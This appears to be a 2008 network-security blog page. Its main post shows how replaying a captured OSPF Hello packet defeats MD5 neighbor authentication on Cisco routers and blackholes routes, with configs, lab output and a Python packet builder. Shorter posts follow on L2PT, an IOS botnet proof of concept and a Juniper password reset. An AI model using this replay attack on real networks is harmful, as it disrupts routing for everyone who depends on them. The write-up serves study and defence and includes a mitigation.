Well, do you think your routing protocols are secure once you enable neighbor authentication with a cryptographic MAC (Message Authentication Code)?
Hahahaha! By the end of this article I hope your view will have turned over!
In this article I will show you how to break OSPF adjacencies on an Ethernet segment with cryptographic authentication enabled. Much of the literature (the Hacking Exposed Cisco Networks book, for example) gives MD5 authentication as the workaround for OSPF's flaws. In the first attack (most of this article) we will blackhole the OSPF routes learned by a victim router that has MD5 authentication enabled. The second attack is less interesting (about two lines at the end of the article). My testbed is two Cisco routers (a 2500 and a 2600) and one GNU/Linux Debian host.
With that in mind, let's see what happens when we break things.
Step zero: an example of the IOS configuration I'll break:
interface Ethernet0
 ip address 192.168.0.101 255.255.255.0
 no ip directed-broadcast
 no ip route-cache
 ip ospf authentication message-digest
 ip ospf authentication-key cisco
 ip ospf message-digest-key 1 md5 cisco
!
router ospf 1
 router-id 192.168.0.101
 network 172.16.0.1 0.0.0.0 area 0
 network 192.168.0.101 0.0.0.0 area 0
 network 192.168.1.1 0.0.0.0 area 0
 network 192.168.1.5 0.0.0.0 area 0
 network 192.168.4.1 0.0.0.0 area 0
(The ip ospf authentication-key line is the key for simple password authentication; once message-digest authentication is selected it is unused, and the MD5 key on the message-digest-key line, key ID 1, is the one that matters.)
First step, and the hardest one in a production network (though not so hard if you are good at social engineering): you have to kill the OSPF adjacency so that you can capture a Hello message with an empty neighbor list (the "Active Neighbor" field in Wireshark).
As you may know, the OSPF MAC covers the OSPF header and the Hello (or other OSPF) payload, but NOT the IP header. So ask yourself the following question, which looks simple at first sight: how do you break the connection between two hosts? The usual Ethernet killer would say: let's poison ARP and redirect the packets from 192.168.0.100 to 192.168.0.101 into a blackhole (with the ettercap isolate plugin, for example). That would work if the exchange were unicast between those two hosts, but OSPF Hellos on a broadcast network are sent to multicast 224.0.0.5, so an ARP attack will not work. So how do we make Snowy think that Tintin is dead, and therefore clear the OSPF adjacency between them? Sadly, I haven't found a better way to break the connection than unplugging the RJ45 ;) Tampering with the IP layer of our OSPF packet is useless, since our goal is a packet whose IP header is valid and processed and whose OSPF payload is accepted, even though the IP header is not covered by the OSPF MAC. Anyway, why focus only on the OSPF Hello packet when an interface can eat a lot of valid or malformed attacks^Wpackets? Keep in mind that your goal is to reset the interface that receives OSPF packets: "There is more than one way to do it".
Hello packet when bidirectional communication has already been established:
OSPF Hello Packet
    Network Mask: 255.255.255.0
    Hello Interval: 10 seconds
    Options: 0x02 (E)
        0... .... = DN: DN-bit is NOT set
        .0.. .... = O: O-bit is NOT set
        ..0. .... = DC: Demand circuits are NOT supported
        ...0 .... = L: The packet does NOT contain LLS data block
        .... 0... = NP: Nssa is NOT supported
        .... .0.. = MC: NOT multicast capable
        .... ..1. = E: ExternalRoutingCapability
    Router Priority: 1
    Router Dead Interval: 40 seconds
    Designated Router: 192.168.0.101
    Backup Designated Router: 192.168.0.100
    Active Neighbor: 192.168.0.101
Second step: wait for the dead interval (40 seconds by default). Keep capturing and look at the first Hello sent after the dead interval has expired: Tintin's router (192.168.0.101) should no longer be present in the active neighbor list. Nice, you've captured the OSPF killer packet!
Notice in the following packet that 192.168.0.101 is no longer present in the Active Neighbor field, nor among the elected DR/BDR.
OSPF Hello Packet
    Network Mask: 255.255.255.0
    Hello Interval: 10 seconds
    Options: 0x02 (E)
        0... .... = DN: DN-bit is NOT set
        .0.. .... = O: O-bit is NOT set
        ..0. .... = DC: Demand circuits are NOT supported
        ...0 .... = L: The packet does NOT contain LLS data block
        .... 0... = NP: Nssa is NOT supported
        .... .0.. = MC: NOT multicast capable
        .... ..1. = E: ExternalRoutingCapability
    Router Priority: 1
    Router Dead Interval: 40 seconds
    Designated Router: 192.168.0.100 (.101 was the DR)
    Backup Designated Router: 0.0.0.0
In the IOS debug output we got this message (ourself being 192.168.0.101):
06:18:36: OSPF: Cannot see ourself in hello from 192.168.0.100 on Ethernet0, state INIT
In the best scenario you capture that Hello when it carries a high cryptographic sequence number (like 0x48ac79cb), before it rolls over to 0x0. The receiver only checks that the sequence number is not lower than the last one it accepted from that neighbor (RFC 2328, Appendix D), so the very same packet can be replayed as often as you like, and as long as its sequence number stays above the live router's, the genuine Hellos are discarded as replays. Replay this single packet on the network, then watch the OSPF neighbor adjacencies:
BEFORE #sh ip ospf neighbor
Neighbor ID     Pri   State           Dead Time   Address         Interface
192.168.0.100     1   FULL/DROTHER    00:00:31    192.168.0.100   Ethernet0
192.168.0.1       1   FULL/DR         00:00:34    192.168.0.1     Ethernet0
AFTER #sh ip ospf neighbor
Neighbor ID     Pri   State           Dead Time   Address         Interface
192.168.0.100     1   INIT/DROTHER    00:00:39    192.168.0.100   Ethernet0
192.168.0.1       1   FULL/DR         00:00:35    192.168.0.1     Ethernet0
There are two things to notice. First, the dead timer is refreshed each time the router receives our packet: the neighbor is not flagged DOWN but stays active and ready to exchange DBD (Database Description) packets, yet it will never reach the 2-WAY state, which requires bidirectional communication (seeing itself in the neighbor list), and our replayed Hello denies exactly that. Second, the STATE of the adjacency: 192.168.0.100 is now stuck in INIT. As a consequence we lose the routes learned through OSPF from 192.168.0.100:
     192.168.4.0/30 is subnetted, 1 subnets
C       192.168.4.0 is directly connected, Loopback2
     192.168.7.0/32 is subnetted, 1 subnets
O       192.168.7.1 [110/11] via 192.168.0.1, 00:00:45, Ethernet0   (we haven't attacked the 192.168.0.1 router)
C    192.168.0.0/24 is directly connected, Ethernet0
     192.168.1.0/30 is subnetted, 2 subnets
C       192.168.1.0 is directly connected, Loopback0
C       192.168.1.4 is directly connected, Loopback1
Then, when we stopped the attack, the adjacency came back to FULL within a few seconds, as soon as the next genuine Hello got processed by the OSPF Hello process:
#sh ip ospf neighbor
Neighbor ID     Pri   State           Dead Time   Address         Interface
192.168.0.100     1   FULL/DROTHER    00:00:38    192.168.0.100   Ethernet0
192.168.0.1       1   FULL/DR         00:00:36    192.168.0.1     Ethernet0
Perhaps you are asking yourself whether the attack uses a lot of CPU? The answer is no. Look at the show processes cpu output yourself:
PID   Runtime(ms)   Invoked   uSecs   5Sec    1Min    5Min   TTY   Process
  2         29944     18069    1657   1.80%   1.12%   0.43%    0   OSPF Hello
And show memory summary reports about 2 kbytes of memory (7 blocks of 312 bytes each, 2184 bytes in total):
Alloc PC    Size   Blocks   Bytes   What
0x33868A2    312        7    2184   OSPF Hello
Secure yourself from these threats:
Pello's tricky method: frequently change your router ID. OSPF keeps neighbor state per router ID, so once the neighbor router moves to a new ID (192.168.5.1 below), the replayed Hello only keeps feeding a stale INIT entry for the old ID 192.168.0.100, while the real router builds a fresh adjacency under its new ID and reaches FULL. (Caveat: on IOS a new router ID only takes effect after the OSPF process is restarted, which drops every adjacency of that router for a moment, and it does not fix the root cause: RFC 2328 only requires the cryptographic sequence number to be non-decreasing, so a captured packet stays replayable until the live sequence number passes it.)
It will end up like this, until the attacker captures a fresh Hello from a new OSPF neighbor DOWN event:
Neighbor ID     Pri   State           Dead Time   Address         Interface
192.168.0.100     1   INIT/DROTHER    00:00:39    192.168.0.100   Ethernet0
192.168.5.1       1   FULL/DROTHER    00:00:38    192.168.0.100   Ethernet0
192.168.0.1       1   FULL/DR         00:00:29    192.168.0.1     Ethernet0
And the OSPF routes from the 192.168.0.100 router are still in the global IP routing table:
     192.168.4.0/30 is subnetted, 1 subnets
C       192.168.4.0 is directly connected, Loopback2
     192.168.5.0/32 is subnetted, 1 subnets
O       192.168.5.1 [110/11] via 192.168.0.100, 02:10:05, Ethernet0
     192.168.7.0/32 is subnetted, 1 subnets
O       192.168.7.1 [110/11] via 192.168.0.1, 02:10:05, Ethernet0
C    192.168.0.0/24 is directly connected, Ethernet0
     192.168.1.0/30 is subnetted, 2 subnets
C       192.168.1.0 is directly connected, Loopback0
C       192.168.1.4 is directly connected, Loopback1
The second attack on OSPF with cryptographic authentication enabled: because the cryptographic sequence number is only incremented once per Hello interval (10 seconds by default), any OSPF packet captured in that window can be replayed within it and will pass the authentication check. It could lead to a DoS attack.
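The mechanism behind both attacks (the stuck-in-INIT replay described above and the in-window replay), as an added example that is not the post's own code: it builds OSPF Hellos with MD5 cryptographic authentication the way RFC 2328 Appendix D defines it (digest over the packet plus the zero-padded key, appended after the packet), verifies them, and models the receiver's per-neighbor sequence-number check. The key "cisco", key ID 1, the router IDs and the 0x48ac79cb sequence number are taken from the post; the assumption that the captured stale Hello carries a higher sequence number than the live ones is mine, following the advice above, and all packets are constructed inline. A real replay would simply re-send the captured bytes to 224.0.0.5; the raw-socket send is left out so the script runs offline.

```python
"""OSPFv2 Hello with cryptographic (MD5) authentication, plus a model of the
receiver-side sequence-number check from RFC 2328 Appendix D. Added example,
not the post's own code; every packet below is constructed inline."""
import hashlib
import hmac
import struct
from socket import inet_aton, inet_ntoa

OSPF_HDR_LEN = 24        # fixed OSPFv2 header
HELLO_FIXED_LEN = 20     # mask, hello interval, options, priority, dead interval, DR, BDR
AUTH_CRYPTO = 2          # AuType 2 = cryptographic authentication
KEY_ID = 1               # "ip ospf message-digest-key 1 md5 cisco" from the post
KEY = b"cisco"


def ospf_md5(pkt, key):
    """RFC 2328 D.4.3: MD5 over the OSPF packet (checksum 0, authentication
    field carrying key id / auth length / sequence number) followed by the
    key zero-padded to 16 bytes. The digest is appended after the packet."""
    return hashlib.md5(pkt + key.ljust(16, b"\x00")).digest()


def build_hello(router_id, seq, neighbors, dr, bdr, key=KEY, key_id=KEY_ID,
                area="0.0.0.0", mask="255.255.255.0", hello=10, dead=40, prio=1):
    """Build a Hello like the ones captured in the post (options 0x02 = E bit)."""
    body = (inet_aton(mask) + struct.pack("!HBBI", hello, 0x02, prio, dead)
            + inet_aton(dr) + inet_aton(bdr)
            + b"".join(inet_aton(n) for n in neighbors))
    length = OSPF_HDR_LEN + len(body)               # the digest is not counted
    hdr = (struct.pack("!BBH", 2, 1, length) + inet_aton(router_id) + inet_aton(area)
           + struct.pack("!HH", 0, AUTH_CRYPTO)                 # checksum 0, AuType 2
           + struct.pack("!HBBI", 0, key_id, 16, seq))          # key id, auth len, crypto seq
    pkt = hdr + body
    return pkt + ospf_md5(pkt, key)


def parse_hello(data, key=KEY):
    """Verify the digest and pull out what the Hello state machine needs."""
    ver, ptype, length = struct.unpack_from("!BBH", data, 0)
    if ver != 2 or ptype != 1:
        raise ValueError("not an OSPFv2 Hello")
    if struct.unpack_from("!H", data, 14)[0] != AUTH_CRYPTO:
        raise ValueError("AuType is not cryptographic")
    _, key_id, auth_len, seq = struct.unpack_from("!HBBI", data, 16)
    pkt, digest = data[:length], data[length:length + auth_len]
    if not hmac.compare_digest(digest, ospf_md5(pkt, key)):
        raise ValueError("bad MD5 digest")
    first = OSPF_HDR_LEN + HELLO_FIXED_LEN
    return {"router_id": inet_ntoa(pkt[4:8]), "key_id": key_id, "seq": seq,
            "dr": inet_ntoa(pkt[36:40]), "bdr": inet_ntoa(pkt[40:44]),
            "neighbors": [inet_ntoa(pkt[i:i + 4]) for i in range(first, length, 4)]}


class OspfReceiver:
    """The victim's view of its neighbors: last accepted sequence number and
    the Hello-driven state, per neighbor router ID. Per RFC 2328 D.4.3 a packet
    is accepted when its sequence number is >= the last accepted one, which is
    what lets one captured packet be replayed forever and lock out older live Hellos."""

    def __init__(self, my_router_id):
        self.me = my_router_id
        self.last_seq = {}
        self.state = {}

    def receive(self, data, key=KEY):
        try:
            h = parse_hello(data, key)
        except ValueError as err:
            return "drop: %s" % err
        nbr = h["router_id"]
        if nbr in self.last_seq and h["seq"] < self.last_seq[nbr]:
            return "drop: seq 0x%x < 0x%x, replay" % (h["seq"], self.last_seq[nbr])
        self.last_seq[nbr] = h["seq"]
        # "Cannot see ourself in hello": no 2-WAY unless our router ID is listed
        self.state[nbr] = "2WAY" if self.me in h["neighbors"] else "INIT"
        return "accept: %s -> %s" % (nbr, self.state[nbr])


def demo():
    """Replay the post's scenario against 192.168.0.101 (the victim)."""
    peer, me = "192.168.0.100", "192.168.0.101"
    victim = OspfReceiver(me)
    live1 = build_hello(peer, 0x1000, [me], dr=me, bdr=peer)          # healthy adjacency
    # Captured after the dead interval: empty neighbor list, DR moved to .100 and
    # (assumption, as the post advises) a higher sequence number than the live one
    stale = build_hello(peer, 0x48ac79cb, [], dr=peer, bdr="0.0.0.0")
    live2 = build_hello(peer, 0x1001, [me], dr=me, bdr=peer)          # next genuine Hello
    forged = bytearray(live1)
    forged[44:48] = inet_aton("10.0.0.1")     # editing the neighbor list without the key
    results = [victim.receive(live1), victim.receive(stale),
               victim.receive(live2), victim.receive(bytes(forged))]
    return results, victim.state[peer]


if __name__ == "__main__":
    for line in demo()[0]:
        print(line)
```

The last two receives show the two sides of the coin: the genuine Hello that follows the replay is rejected purely on its lower sequence number, while a packet whose neighbor list was edited without the key fails the digest. Nothing in the MAC ties a Hello to the time it was sent, which is all the attack needs.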
August 20th, 2008
If you don't want to see your TFTP file transfer crawling at 259 bytes/second between a Cisco ASA and your Windows XP workstation, don't forget to close your Virtual PC machine.
Today I initiated a TFTP file transfer between a freshly out-of-the-box Cisco ASA and a SolarWinds TFTP server hosted on a Windows XP workstation. Traffic was very, very slow. Show interfaces reported "5 minute output rate 0 pkts/sec, 259 bytes/sec".
So what the fuck? I was very skeptical about this issue... I ran Wireshark and no interface was available except the generic dialup one. And then the idea came to my brain: I'm running Debian in Virtual PC. No, it can't be?? Yes, it can. Don't blame the network so early in your troubleshooting steps... VPC was the root problem :)
Click here to see the TFTP transfer speed changing over time!
Want to dream of QoS rate limiting without adding a single line of configuration? Run Virtual PC!
August 19th, 2008
When a networking geek finds a new feature, he loves to implement it on his network perimeter (perhaps Benmoon will read this article).
But sometimes the super feature is not applicable to every kind of production network.
That's the case for L2PT (Layer 2 Protocol Tunneling), a feature especially useful to the customers of VPLS (Virtual Private LAN Service, i.e. Ethernet-based) service providers. The Cisco documentation on how L2PT is used is thin and not very clear, but CCIE hackers use it. The feature's goal is to stretch one layer 2 network across multiple geographically remote sites over the WAN. I'll try to add another dimension to the understanding of this feature.
First thing to know: when you hear L2PT, think "big switch" or "big trunk" in Cisco terminology.
Second thing to know: L2PT tunnels Spanning Tree, CDP and VTP frames (plus PAgP, LACP and UDLD), and with 802.1Q tunneling the customer's VLANs ride along.
Third thing to know: it does nothing except give you the possibility to extend the size of the layer 2 domain.
Why do I need a big switch?
To increase the layer 2 domain size between Paris, London and Sydney:
- Single bridge domain (one VLAN)
- Single subnet
- Single SLA
- MAC address learning and forwarding
To make this work over a WAN, L2PT is mandatory.
Guys, I have a Wacom tablet, so I'll definitely try to use it for this article. As I used to tell my students, it's best-effort drawing ;-)
L2PT big picture over an MPLS/VPLS backbone:

A switch as a CE (Customer Edge)?
It's not because it's a layer 2 thing that a switch is absolutely required. You can have a switch and/or a router, i.e. anything that can do 802.1Q tunneling.
Who configures L2PT in IOS?
L2PT is configured on the ISP equipment (commands borrowed from packetlife). These lines are typed on the provider edge ports facing the customer, where the CDP, STP and VTP frames enter the tunnel and flow through the backbone until they reach another site of the same customer.
interface GigabitEthernet0/1
 l2protocol-tunnel cdp
 l2protocol-tunnel stp
 l2protocol-tunnel vtp
 no cdp enable
Limitations of L2PT
Don't forget the MAC address table limits and the 4094-VLAN limit, which call for PBT (Provider Backbone Transport) or H-VPLS (Hierarchical VPLS) to scale and break the simple L2PT picture. Also, in the good-to-know department, keep in mind that a virtual switch behaves like a conventional switch with respect to flooding/forwarding, MAC learning/aging and loop prevention for unicast, broadcast and multicast traffic, so always keep an eye on your layer 2 perimeter (the part not owned by the ISP).
L2PT should only be used for small customer deployments.
And security?
One thing is sure: these technologies open massive leaking holes in the network security field. I will name two: redundant multihomed connections (local traffic may get tunneled into the service provider backbone) and VLAN number mismatches: imagine VLAN 10 in the Sydney site is the Wi-Fi hotspot VLAN while VLAN 10 in Paris is the customer database VLAN; once both sites share one bridge domain, the hotspot and the databases sit in the same broadcast domain.
August 16th, 2008
Strange behavior in the pipe! Welcome!
I was working on a bug PoC thanks to an old-fashioned 2611 router when the problem began: packets can't reach their destination from or to an Ethernet sub-interface when the physical interface is up and has no IP address.
I ping 192.168.0.23, which is connected to Ethernet0/0 by a crossover cable.
CDP is exchanged, as it's layer 2 and uses the physical interface.
I have also tested with the 2611 connected to a 2500 router and to a 2900 switch.
Same behavior: I can't ping from or to the sub-interface (192.168.0.100).
And of course it works like a charm when I set it up on the physical interface.
Do you know a mystic trick to make this work, other than using other hardware or using dynamips linked to the host computer's interface?
Anyway, I really need to use the subif, otherwise my bug PoC won't be viable :)
Show command output:
hacking2600#sh ip int brief
*Mar 1 00:07:43.848: %SYS-5-CONFIG_I: Configured from console by console
Interface       IP-Address      OK?   Method   Status   Protocol
Ethernet0/0     unassigned      YES   manual   up       up
Ethernet0/0.1   192.168.0.100   YES   manual   up       up
sh run
interface Ethernet0/0
 no ip address
 full-duplex
!
interface Ethernet0/0.1
 encapsulation dot1Q 1 native
 ip address 192.168.0.100 255.255.0.0
!
When I try to ping, debug ip packet says "encapsulation failed".
There is nothing special in Wireshark: the PC responds to the ICMP requests, but it looks like the router drops the stuff.
Tried with two different IOS versions.
Don't get fucked by the network mask.
Debug ip packet detail output:
*Mar 1 00:44:38.907: IP: tableid=0, s=192.168.0.100 (local), d=192.168.0.23 (Ethernet0/0.1), routed via RIB
*Mar 1 00:44:38.907: IP: s=192.168.0.100 (local), d=192.168.0.23 (Ethernet0/0.1), len 100, sending
*Mar 1 00:44:38.907: ICMP type=8, code=0
*Mar 1 00:44:38.907: IP: s=192.168.0.100 (local), d=192.168.0.23 (Ethernet0/0.1), len 100, encapsulation failed
*Mar 1 00:44:38.911: ICMP type=8, code=0.
Success rate is 0 percent (0/5)
hacking2600#
*Mar 1 00:44:44.112: IP: s=192.168.0.100 (local), d=224.0.0.5 (Ethernet0/0.1), len 64, sending broad/multicast, proto=89
August 16th, 2008
In this funny video (yeah, I like the FBI even if I don't know them), I will show you my IOS botnet proof of woot.
It's real, but I don't want to be a security pr0nstar showing my 4ss at conferences, nor take the time to make the perfect proof of concept that everyone in the IT security field dreams about at least once in his career. Just have some fun with computers thanks to my poor TCL programming skills.
So yeah, I've hacked 127.0.0.1 in order to leak my old hard disk for you.
Why now?
- IOS stuff has been breaking news for some months, so even the most stupid human can understand what I did (or not)
- Holidays: I'd like fewer people to see this, to stop the blargh about something Cisco mitigated a long time ago
- I'm clear with Cisco about it and helped their R&D reproduce the proof of concept
- Definitely not a 0-day!
Click here to join #lol
Let one rip and you'll feel better ...
August 14th, 2008
From the logs I learned that the last time I booted my Juniper JunOS Olive VMware image was one year ago.
Not surprisingly, I forgot my password.
I tried the official password recovery methods and other stuff from Google, which led to an epic FAIL.
Well, you know, Olive is just a hack. Luckily FreeBSD and the UNIX commands are inside, and today is a creativity day :)
Here's my unofficial method to recover the root password if you are really, really stuck:
fsck /dev/ad0s1e
mount -o rw /dev/ad0s1e /config
cd /config                         # the following commands operate on files in /config
gunzip juniper.conf.gz
mv juniper.conf juniper.orig
cat -b juniper.orig                # numbered listing: check that line 4 is the root password line the sed below replaces
export NEWROOTPWD="plain-text-password \"root\";"
sed "4s/.*/ ${NEWROOTPWD}/" juniper.orig >> juniper.conf
gzip juniper.conf
rm juniper.orig
cd /                               # leave the mount point so umount succeeds
umount /dev/ad0s1e
reboot
Hurrah! Your console access is back!
August 14th, 2008
Are you looking for bandwidth or latency stress tools?
I won't tell you to look at Spirent or BreakingPoint, because they cost tons of bucks.
Here is a list of free tools for Windows, Linux and BSD:
- iperf - TCP/UDP/multicast - http://sourceforge.net/projects/iperf/
- tfgen - UDP - http://www.st.rim.or.jp/~yumo/pub/tfgen.html
- netcps - http://www.netchain.com/netcps/
- PCAUSA Test TCP - http://www.pcausa.com/Utilities/ttcpdown1.htm
- OpenWebLoad - http://openwebload.sourceforge.net/
- SIPp - SIP voice signaling protocol - http://sipp.sourceforge.net/
- DPT - DNS protocol - Win32 - Linux - Mac OS X
- TXDNS - multithreaded DNS testing - Win32
- tcpbench - TCP benchmarking and measurement - included in OpenBSD
- Ixia Qcheck - http://www.ixiacom.com/products/performance_applications/pa_display.php?skey=qcheck - submitted by Joe
Feel free to add a comment to complete the list!
July 30th, 2008

This morning when I opened my mail inbox, I found this gem, and it's too late for an April fool:
From: K…. P….. (k…….)
Sent: Tuesday, July 29, 2008 22:09
To: blarg-obfuscated (mailer list)
Subject: Reset router
I cannot log into to my router. What is the command to reset the router to factory default?
--
K…. P….., CISSP, CISA, GSNA, ITIL
Sr Systems Engineer
Security/ Compliance Specialist
Cisco Systems Inc.
13600 Dulles Technology Drive
Herndon Va 20171
Direct 7.. … ….
Mobile 7.. … ….
http://www.cisco.com/go/security
July 30th, 2008
Irina from Cisco Moscow told me yesterday that I am funny. Well, Windows XP is too.
telnet.exe dislikes cat /dev/mem piped through socat :-/
Click here to view the Windows XP telnet.exe bug
July 28th, 2008
You'd have to be disconnected from the Internet, on holiday in Corsica or a trainer at SUPINFO, too busy coding an SMTP exploit that will root the whole planet, or working at an ISP, not to have heard about this summer's buzz: Dan Kaminsky, Paul Vixie and DNS.
The Internet being polluted enough already ... and in order to stand out from the bloggers on the DNS flaw who all tell the same story, why not do a "yo mama" series about DNS?
- Yo mama forgot her brain so badly when she woke up that she still believes there are 13 physical DNS root servers
- Yo mama is so hopeful she tells everyone that AAAA is the future
- Yo mama understands so little of her network architecture that she doesn't dare patch BIND
- Yo mama is so open she caches powned.doxpara.com
- Yo mama is so ugly Dan doesn't dare brute-force her
- Yo mama has so little to do that she has time to read RFC 2181
- Yo mama is such a sucker she still believes DNSSEC can be deployed in 6 minutes
- Yo mama wants to become a star so badly she's fuzzing additional RRs this summer
- Yo mama is so paranoid she digs her MacBook Pro under Mac OS X
- Yo mama has read Theo's autobiography so much that she thinks the BIND on her OpenBSD is safe
Yeah!
July 24th, 2008